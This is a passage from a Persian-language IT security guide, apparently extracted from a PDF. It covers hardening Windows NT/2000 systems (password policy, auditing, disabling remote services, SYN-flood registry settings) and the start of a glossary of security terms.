‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻃﻮﻻﻧﻲﺗﺮ ﺗﺸﻮﻳﻖ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﭘﻴﭽﻴﺪﮔﻲ ﻭ ﺗﺎﺭﻳﺦ ﺍﻧﻘﻀﺎ ﺭﺍ ﺑﺮﺍﻱ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺍﺟﺒـﺎﺭﻱ ﻛﻨﻴـﺪ ﺗـﺎ ﺧﻄـﺮ‬
‫ﺣﺪﺱ ﺯﺩﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻛﺎﻫﺶ ﻳﺎﺑﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻋﻀﻮ ﺩﺍﻣﻨـﻪﻫـﺎﻱ ‪ Windows 2000‬ﻫـﺴﺘﻨﺪ ﺭﻣﺰﻫـﺎﻱ‬
‫ﻋﺒﻮﺭ ﺩﺭ ﻛﻨﺘﺮﻟﮕﺮ ﺩﺍﻣﻨﻪ ﺫﺧﻴﺮﻩ ﻭ ﺳﭙﺲ ﺑﻪ ﺭﻭﺵ ﻣﻌﻤﻮﻝ ‪ kerberos‬ﻣﺪﻳﺮﻳﺖ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻗﺎﺑﻠﻴﺖ ﻗﻔﻞﺷﺪﻥ ﺣﺴﺎﺑﻬﺎ )ﭘﺲ ﺍﺯ ﭼﻨـﺪﺑﺎﺭ ﺗـﻼﺵ‬
‫ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺎﺩﺭﺳﺖ( ﺭﺍ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﻓﻌﺎﻝ ﻛﺮﺩ ﺗﺎ ﺗﻼﺷﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺣﺪﺱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﻫﺰﻳﻨﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺩﺭ ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ ،Windows‬ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﻓﻌﺎﻝ ﻧﻴﺴﺖ‪ .‬ﻣﻤﻴﺰﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻣﺤﻠـﻲ )ﻳـﺎ‬
‫ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺩﺍﻣﻨﻪ( ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ‪ .‬ﻓﻌﺎﻝ ﻛﺮﺩﻥ ﻣﻤﻴﺰﻱ ﻭﺭﻭﺩ ﺑﻪ ﺣﺴﺎﺑﻬﺎ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻼﺷﻬﺎﻳﻲ ﻛﻪ ﺑـﺮﺍﻱ ﻭﺭﻭﺩ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ ﻣﻔﻴﺪ ﺍﺳﺖ‪ .‬ﺭﺧﺪﺍﺩﻫﺎﻱ ﻣﻤﻴﺰﻱﺷﺪﻩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ "ﻧﻤﺎﻳﺸﮕﺮ ﺭﺧﺪﺍﺩﻫﺎ" ﻣﺸﺎﻫﺪﻩ ﻛـﺮﺩ‪ .‬ﺛﺒـﺖ ﻛـﺮﺩﻥ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﻧﺎﻣﻮﻓﻖ )ﻣﺎﻧﻨﺪ ﻛﺎﺭﺑﺮﺩ ﻧﺎﻣﻮﻓﻖ ﺍﻣﺘﻴﺎﺯﺍﺕ( ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺑﻪ ﺛﺒﺘﻬﺎ ﺣﺠﻢ ﻛﺎﻓﻲ ﺍﺯ ﺩﻳﺴﻚ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻴﺪ )ﺍﺯ ﻃﺮﻳﻖ ﻧﻤﺎﻳـﺸﮕﺮ‬
‫ﺭﺧﺪﺍﺩﻫﺎ(‪ ،‬ﻭ ﺩﺳﺘﺮﺳﻲ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻬﻤﺎﻥ ﺑﻪ ﺛﺒﺘﻬﺎ ﺭﺍ ﺑﺒﻨﺪﻳﺪ‪.‬‬

‫ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ‬


‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows NT‬ﻏﺎﻟﺒﹰﺎ ﺧﺪﻣﺎﺕ ﻓﻌـﺎﻝ ﺯﻳـﺎﺩﻱ ﺩﺍﺭﻧـﺪ‪ .‬ﺧـﺪﻣﺎﺕ ﺩﺭ ‪ Windows‬ﻣﺜـﻞ ‪daemon‬ﻫـﺎ ﺩﺭ ‪Unix‬‬
‫ﭘﺮﺩﺍﺯﻩﻫﺎﻳﻲ ﺩﺭ ﭘﺲﺯﻣﻴﻨﻪ ﻣﻲﺑﺎﺷﻨﺪ ﻛﻪ ﺗﻮﺍﺑﻌﻲ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺑﺮﺧـﻲ ﻣـﻮﺍﺭﺩ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﺩﺭ ﻛﻨـﺎﺭ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ )ﻣﺎﻧﻨﺪ ‪ (telnet‬ﻳﺎ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﺍﻟﻬﺎ‪ ،‬ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨـﺎﺑﻊ ﺭﺍ ﻧﻴـﺰ ﻓـﺮﺍﻫﻢ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺳﺮﻭﻳﺲ ‪ Messenger‬ﺑﻪ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﭘﻨﺠﺮﻩﻫﺎﻱ ﺍﺧﻄﺎﺭﻱ ﺭﺍ ﺩﺭ ﻣﺎﺷـﻴﻨﻬﺎﻱ ﻣﺤﻠـﻲ ﺑـﺎﺯ‬
‫ﻛﻨﻨﺪ ﻭ ﺍﻣﺮﻭﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺗﻮﺳﻂ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ‪ Services‬ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺪﻳﺮﻳﺖ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ ﻣﺘﻮﻗـﻒ ﻳـﺎ ﻏﻴﺮﻓﻌـﺎﻝ‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻳﻲ ﻛﻪ ﻓﺎﻳﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﻧﻤﻲﮔﺬﺍﺭﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺧﺪﻣﺎﺕ ‪ remote registry access ،telnet‬ﻭ ﺑـﺴﻴﺎﺭﻱ‬
‫ﺩﻳﮕﺮ ﺍﺯ ﺧﺪﻣﺎﺕ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩ ﺗﺎ ﻧﻘﺎﻁ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ )ﺣﺘﻲ ﺍﮔﺮ ﺷﺪﻩ ﺑﻪ ﻗﻴﻤﺖ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻤﺮﻛﺰ( ﻛﺎﻫﺶ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﮔﺮﻭﻫﻲ ﻳﺎ ﻣﺤﻠﻲ‪ ،‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﺎﺭﺑﺮﺍﻥ ﮔﻤﻨﺎﻡ ﺑﺪﻭﻥ ﻣﺠﻮﺯﻫﺎﻱ ﺻﺮﻳﺢ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨـﺎﺑﻊ‬
‫ﺣﻴﺎﺗﻲ ﻧﺪﺍﺭﻧﺪ‪) .‬ﺍﻳﻦ ﺗﻨﻈﻴﻤﺎﺕ ﺩﺭ ‪ Windows 2000‬ﺩﺭ ﻗﺴﻤﺖ ‪ Security Options‬ﺩﺭ ﺑﺨﺶ ‪ Local Policies‬ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪(.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‬

‫ﭘﺮﺩﺍﺯﻩﻫﺎ ﻭ ﺣﺎﻓﻈﻪ‬
‫ﺍﺯ ﻃﺮﻳﻖ ‪ Task Manager‬ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ‪ Windows‬ﻧﻈﺎﺭﺕ ﻛﺮﺩ‪ ،‬ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﻳﺎﻥ ﺑﺨﺸﻴﺪ‪ ،‬ﻭ ﻳﺎ ﺍﻭﻟﻮﻳﺖ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺭﺍ ﺑﻪ ﻳﻜـﻲ‬
‫ﺍﺯ ﺷﺶ ﺳﻄﺢ‪ ،‬ﺍﺯ "ﭘﺎﻳﻴﻦ" ﺗﺎ "ﺑﻼﺩﺭﻧﮓ" ﺗﻐﻴﻴﺮ ﺩﺍﺩ‪ Task Manager .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺣﺎﻓﻈﺔ ﻣﺼﺮﻓﻲ ﻫﺮ ﭘﺮﺩﺍﺯﻩ ﺭﺍ ﻧﻤﺎﻳﺶ ﺩﻫـﺪ‪ .‬ﺍﺯ‬
‫ﺁﻧﺠﺎ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﺑﻪ ﻧﺪﺭﺕ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﻭ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﺣﻤﻼﺕ ﺳﺮﺭﻳﺰ ﺣﺎﻓﻈـﻪ ﻭ ﭘـﺮﺩﺍﺯﻩ‬
‫ﻻ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺁﺷﻜﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳﻖ ‪ Task Manager‬ﻛﺸﻒ ﻭ ﺍﺯ ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺍﻧﺪﺍﺧﺘﻪ ﺷﻮﺩ‪.‬‬
‫ﻣﻌﻤﻮ ﹰ‬

‫ﺩﻳﺴﻜﻬﺎ‬
‫‪ NTFS‬ﺩﺍﺭﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ quota‬ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﺭﻳﺰ ﺷﺪﻥ ﺩﻳﺴﻜﻬﺎ ﻭ ‪partition‬ﻫﺎ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺍﻳﻦ ﻭﻳﮋﮔـﻲ‬
‫ﻻ ﻛﺎﺭﺑﺮﻱ ﻏﻴﺮ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻧﺪﺍﺭﻧـﺪ‬
‫ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻔﻴﺪ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺑﺮﺍﻱ ﺍﺟﺮﺍﺷﺪﻥ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٥٢‬‬

‫ﺷﺒﻜﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows NT‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺑﺮﺧﻲ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺷـﺒﻜﻪﺍﻱ ﻣﺎﻧﻨـﺪ ﺳـﻴﻞ ‪ SYN‬ﺩﺍﺭﺍﻱ‬
‫ﺗﻨﻈﻴﻤﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ‪ registry‬ﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﺗﻨﻈﻴﻤﺎﺕ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﻓﻌﺎﻝ ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﺗﻨﻈﻴﻤﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮﺭﺳﻲ‬
‫ﻛﻨﻴﺪ ﺩﺭ ﻣـﺴﻴﺮ ‪ \HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Tcpip\Parameters‬ﻗـﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺁﻧﻬﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ‪ ،TcpMaxHalfOpen ،SynAttackProtect‬ﻭ ‪.TcpMaxHalfOpenRetried‬‬
‫ﻭﻗﻮﻉ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﻗﺎﺑﻠﻴﺖ "‪"automatic detection and discovery‬‬
‫ﺑــﺴﻴﺎﺭ ﺩﺷــﻮﺍﺭ ﻛــﺮﺩ‪ .‬ﺑــﺮﺍﻱ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﻭﺍﻛــﻨﺶ ﻋﺠﻴــﺐ ﺳﻴــﺴﺘﻢ ﺑــﻪ ﺷــﺮﺍﻳﻂ ﻏﻴﺮﻋــﺎﺩﻱ ﺷــﺒﻜﻪ ﺑﺎﻳــﺪ ﺑــﻪ ﻛﻠﻴــﺪﻫﺎﻱ‬
‫‪ EnableDeadGWDetect ،EnablePMTUDiscovery‬ﻭ ‪ EnableICMPRedirects‬ﻣﻘﺪﺍﺭ ‪ ٠‬ﺩﺍﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻭﺍﺳﻄﻬﺎ ﺭﺍ‬
‫ﺑﺎﻳﺪ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﺮﺩ ﻛﻪ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺟﺴﺘﺠﻮﻱ ﻣﺴﻴﺮﻳﺎﺏ ﻧﭙﺮﺩﺍﺯﻧﺪ ﻭ ﻫﻤﻮﺍﺭﻩ ﻣﺴﻴﺮﻫﺎﻱ ﺍﻳـﺴﺘﺎ ﻭ ﺍﺯ ﭘـﻴﺶ ﺗﻌﺮﻳـﻒﺷـﺪﻩ ﺭﺍ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﭘﻴﻮﺳﺖ ‪ .۱‬ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ‬


‫ﭘﻴﻮﺳﺖ ‪ .۲‬ﻛﺘﺎﺑﻨﺎﻣﻪ‬
‫ﭘﻴﻮﺳﺖ ‪ .۳‬ﻣﻨﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﭘﻴﻮﺳﺖ ‪ .۴‬ﺳﺎﺯﻣﺎ‪‬ﺎﻱ ﺍﻣﻨﻴﱵ‬
‫ﭘﻴﻮﺳﺖ ‪ .۵‬ﻣﻨﺎﺑﻊ ﭼﺎﭘﻲ‬
‫‪٤٥٥‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪٣٦٧‬‬
‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑﻨﻈﺮ ﻋﻤﻠﻜﺮﺩ ﻣﻔﻴـﺪ ﻭ ﻣـﺸﺮﻭﻋﻲ ﺩﺍﺭﺩ‪،‬‬
‫ﻻ ﺑﺪﺧﻮﺍﻫﺎﻧـﻪ ﻧﻴـﺰ‬
‫ﺍﻣﺎ ﺣـﺎﻭﻱ ﻳـﻚ ﻋﻤﻠﻜـﺮﺩ ﻣﺨﻔـﻲ ﻭ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﺑﺎ ﺑﻬـﺮﻩﺑـﺮﺩﺍﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻲ ﻛـﻪ ﺭﻭﻱ ﺁﻥ‬
‫ﻧﺼﺐ ﺍﺳﺖ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﭘـﺸﺖ‬ ‫ﭘﻴﻮﺳﺖ ‪۱‬‬
‫ﺳﺮ ﺑﮕﺬﺍﺭﺩ‪.‬‬
‫ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ‬
‫‪٣٦٨‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ )‪(DES‬‬
‫‪٣٦٢‬‬
‫ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛـﻪ ﺗﻮﺳـﻂ ‪ EMB‬ﺳـﺎﺧﺘﻪ ﺷـﺪﻩ ﻭ‬ ‫ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫﭘﺬﻳﺮﻱ‬
‫ﺳﭙﺲ ﺑﻮﺳﻴﻠﺔ ﻣﺆﺳـﺴﺔ ﻣﻠـﻲ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺭﺳـﻲ ﻭ ﺩﺭ ﺳـﺎﻝ‬ ‫ﻻ ﻗﺴﻤﺘﻲ ﺍﺯ ﺍﻋﻄـﺎﻱ ﮔـﻮﺍﻫﻲ ﺑـﻪ‬ ‫ﻳﻜﻲ ﺍﺯ ﺑﺮﺭﺳﻴﻬﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫‪ ۱۹۷۷‬ﺍﻧﺘﺨﺎﺏ ﺷﺪ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ DES‬ﻛﻪ ﺩﺭ ‪ ۲۰‬ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺩﺭ‬ ‫ﺳﻴﺴﺘﻢ ﺍﻧﺠﺎﻡ ﻣﻲﭘﺬﻳﺮﺩ ﻭ ﻃﻲ ﺁﻥ ﺍﺭﺯﻳﺎﺑﻬﺎ ﺗﻼﺵ ﻣـﻲﻛﻨﻨـﺪ ﺑـﺎ‬
‫ﻫﺮ ﺩﻭ ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑـﻮﺩﻩ‪ ،‬ﺍﻣﺘﺤـﺎﻥ‬ ‫ﻓﺮﻳﺐ ﺩﺍﺩﻥ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺭﺍﻫﻬﺎﻱ ﻧﻔﻮﺫ ﺑﻪ ﻻﻳﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺨﻮﺑﻲ ﭘﺲ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺭﺍ ﻛﺸﻒ ﻛﻨﻨﺪ‪.‬‬

‫‪٣٦٣‬‬
‫‪٣٦٩‬‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺗﻠﻔﻨﻲ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ‬
‫ﺗﻬﺎﺟﻤﻲ ﻛﻪ ﻃﻲ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻳـﻚ‬ ‫ﻳﻚ ﻧﻘﺺ ﻳﺎ ﺿﻌﻒ ﺩﺭ ﻃﺮﺍﺣﻲ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ‪ ،‬ﻳـﺎ ﻋﻤﻠﻜـﺮﺩ ﻳـﻚ‬
‫ﺧﻂ ﺳﻴﺴﺘﻢ ﺍﺭﺗﺒﺎﻃﻲ ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺍﺻﻄﻼﺡ‬ ‫ﺳﻴﺴﺘﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻮﺭﺩ ﺑﻬـﺮﻩﺑـﺮﺩﺍﺭﻱ ﻗـﺮﺍﺭ‬
‫ﺩﺭ ﺍﺻﻞ ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻜﺎﻧﻴﻜﻲ ﺑﻪ ﻳﻚ ﺭﺳﺎﻧﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺑﻜـﺎﺭ‬ ‫ﺑﮕﻴﺮﺩ ﻭ ﻣﻨﺠﺮ ﺑﻪ ﻧﻘﺾ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢ ﺷﻮﺩ‪.‬‬
‫ﻣﻲﺭﻓﺘﻪ‪ ،‬ﺍﻣﺎ ﻫﻢﺍﻛﻨﻮﻥ ﺑﻪ ﺧﻮﺍﻧﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻫﺮ ﻭﺍﺳﻄﻲ ﻛـﻪ‬ ‫‪٣٦٤‬‬
‫ﺍﺑﺰﺍﺭ ﺟﺎﺳﻮﺳﻲ‬
‫ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ )ﺣﺘﻲ ﺩﺳـﺘﻴﺎﺑﻲ‬
‫ﺑﺮﻧﺎﻣﻪ ﺍﻱ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺮﺍﻱ ﺩﺯﺩﻳﺪﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻭ‬
‫ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻴﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﮔـﺮﻩ‪ ،‬ﺩﺭﻭﺍﺯﻩ‪ ٣٧٠‬ﻭ ﻳـﺎ ﺳـﻮﺋﻴﭻ‪(٣٧١‬‬
‫ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪٣٦٥‬‬
‫‪٣٧٢‬‬ ‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ )‪(ISP‬‬
‫ﺍﻣﺘﻴﺎﺯ ﺣﺪﺍﻗﻞ‬
‫ﺷﺮﻛﺘﻲ ﻛﻪ ﻳﻚ ﻓـﺮﺩ ﻳـﺎ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻥ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫ﻃﺮﺍﺣﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﺣﺪﺍﻗﻞ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ‬
